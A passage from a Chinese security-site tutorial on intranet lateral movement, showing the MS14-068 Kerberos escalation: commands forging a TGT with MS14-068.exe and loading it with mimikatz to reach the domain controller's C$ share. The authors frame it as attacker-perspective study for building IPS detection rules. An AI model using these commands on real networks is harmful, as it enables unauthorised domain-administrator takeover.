欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

内网横向移动技巧总结

来源:本站整理 作者:佚名 时间:2020-03-14 TAG: 我要投稿

cifs是指的文件共享服务,有了cifs服务权限,就可以访问域控制器的文件系统:

3.4.4MS14-068
MS14-068域提权漏洞,对应补丁编号:kb3011780,利用该漏洞可以将任何一个域用户提权至域管理员权限。
1、在普通域用户机器上直接访问域控制器的C盘目录

2、利用MS14-068伪造生成TGT:
MS14-068.exe -u strage@test.com -s S-1-5-21-457432167-2946190674-2696793547-1103 -d 192.168.140.140 -p Admin@str

3、利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书:
mimikatz.exe "kerberos::ptc TGT_strage@test.com.ccache" exit


4、重新执行dir命令:
dir \\dc\C$

四、总结
本文从攻击者视角总结了突破边界后的攻击技巧, 我们团队开发ips规则也从相关协议和流量角度来发现攻击者进入内网的痕迹。后续如果从防护角度有新的分析结果我们也会进行分享出来,同时也欢迎攻防大佬一起交流。由于水平有限,欢迎大家指出文中的错误和交流指教。
 

上一页  [1] [2] [3] [4] [5] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载